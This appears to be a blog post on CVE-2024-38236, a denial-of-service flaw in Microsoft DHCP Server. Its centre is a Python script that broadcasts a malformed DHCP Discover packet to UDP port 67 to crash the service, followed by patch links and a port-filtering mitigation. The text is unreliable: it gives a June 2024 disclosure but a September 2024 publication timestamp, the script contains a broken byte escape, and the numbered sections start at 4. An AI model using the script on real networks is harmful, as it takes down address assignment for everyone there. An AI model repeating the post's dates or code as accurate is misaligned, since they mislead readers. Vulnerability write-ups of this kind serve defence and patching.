In June 2024, Microsoft disclosed CVE-2024-38236, a vulnerability affecting its widely-used DHCP (Dynamic Host Configuration Protocol) Server. This bug enables attackers to remotely crash the DHCP service, resulting in network outages for any infrastructure that relies on DHCP for automatic IP assignment. In this post, we’ll break down what CVE-2024-38236 is, show a reproducible proof-of-concept (PoC), discuss mitigations, and direct you to the official patches and advisories.
What is CVE-2024-38236?
The vulnerability stems from improper handling of crafted requests in Microsoft’s DHCP Server service. By sending a specially crafted DHCP packet, an attacker on the local network can cause the DHCP Server to enter a denial-of-service (DoS) state, taking it offline until it is manually restarted. While it does not allow direct code execution or privilege escalation, the attack can cause serious interruption for any environment relying on DHCP (for example, offices, schools, or even ISPs).
Exploit Details & How It Works
This vulnerability relies on malformed options within DHCP packets. When the Microsoft DHCP Server tries to process the incoming packet, it encounters an unhandled condition (such as an invalid length or an option outside expected bounds), which crashes the service process.
Example Traffic
An offending DHCP packet might abuse the length field or option values to trigger the flaw. For this example, let’s focus on a DHCP Discover packet with invalid options:
# dhcp_dos_exploit.py
import socket
def build_dhcp_discover():
# Ethernet frame and basic setup omitted for brevity
dhcp_discover = b''
dhcp_discover += b'\x01' # Message type: Boot request (1)
dhcp_discover += b'\x01' # Hardware type: Ethernet
dhcp_discover += b'\x06' # Hardware address length: 6
dhcp_discover += b'\x00' # Hops:
dhcp_discover += b'\x39\x03\xf3\x26' # Transaction ID
dhcp_discover += b'\x00\x00' # Seconds elapsed:
dhcp_discover += b'\x80\x00' # Bootp flags: x800 (Broadcast)
dhcp_discover += b'\x00'*4 # Client IP address: ...
dhcp_discover += b'\x00'*4 # Your (client) IP address: ...
dhcp_discover += b'\x00'*4 # Next server IP address: ...
dhcp_discover += b'\x00'*4 # Relay agent IP address: ...
dhcp_discover += b'\x00\xc\x29\x4f\x8e\x35' # Client MAC address
dhcp_discover += b'\x00'*10 # Padding for MAC
dhcp_discover += b'\x00'*192 # BOOTP legacy padding
dhcp_discover += b'\x63\x82\x53\x63' # DHCP magic cookie
# Here is the malformed option (option 53, with illegal length)
dhcp_discover += b'\x35' # DHCP Message Type
dhcp_discover += b'\xFF' # Length field set way too high (255)
dhcp_discover += b'\x01' * 255 # Exaggerated values just to crash the parser
# End option
dhcp_discover += b'\xff'
return dhcp_discover
def send_dhcp():
# Sending raw UDP packet
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(build_dhcp_discover(), ('255.255.255.255', 67))
print("Malformed DHCP Discover sent!")
if __name__ == '__main__':
send_dhcp()
⚠️ For educational testing in isolated labs only. Never attack a production system or network you don’t own.
- Microsoft’s official patch (June 2024 Patch Tuesday)
- Advisory: CVE-2024-38236 | DHCP Server Service Denial of Service Vulnerability
- Security Update: Download Updates via Windows Update or your preferred management system
4. If You Can’t Patch
- As a temporary step, restrict DHCP traffic (port 67/UDP) at the router to only required devices.
References and Further Reading
- Microsoft Security Update Guide – CVE-2024-38236
- ISC DHCP RFC – General info on DHCP protocol
- Wireshark DHCP Analysis – Learn to analyze DHCP traffic
Final Thoughts
DHCP is the backbone of most networks, silently ensuring devices get IPs every day. Flaws like CVE-2024-38236 remind us of the importance of defense-in-depth: don’t expose essential services outside their trusted enclave, and keep up with patches. If you run Microsoft DHCP servers, this is a must-fix vulnerability.
Timeline
Published on: 09/10/2024 17:15:27 UTC
Last modified on: 10/09/2024 01:26:09 UTC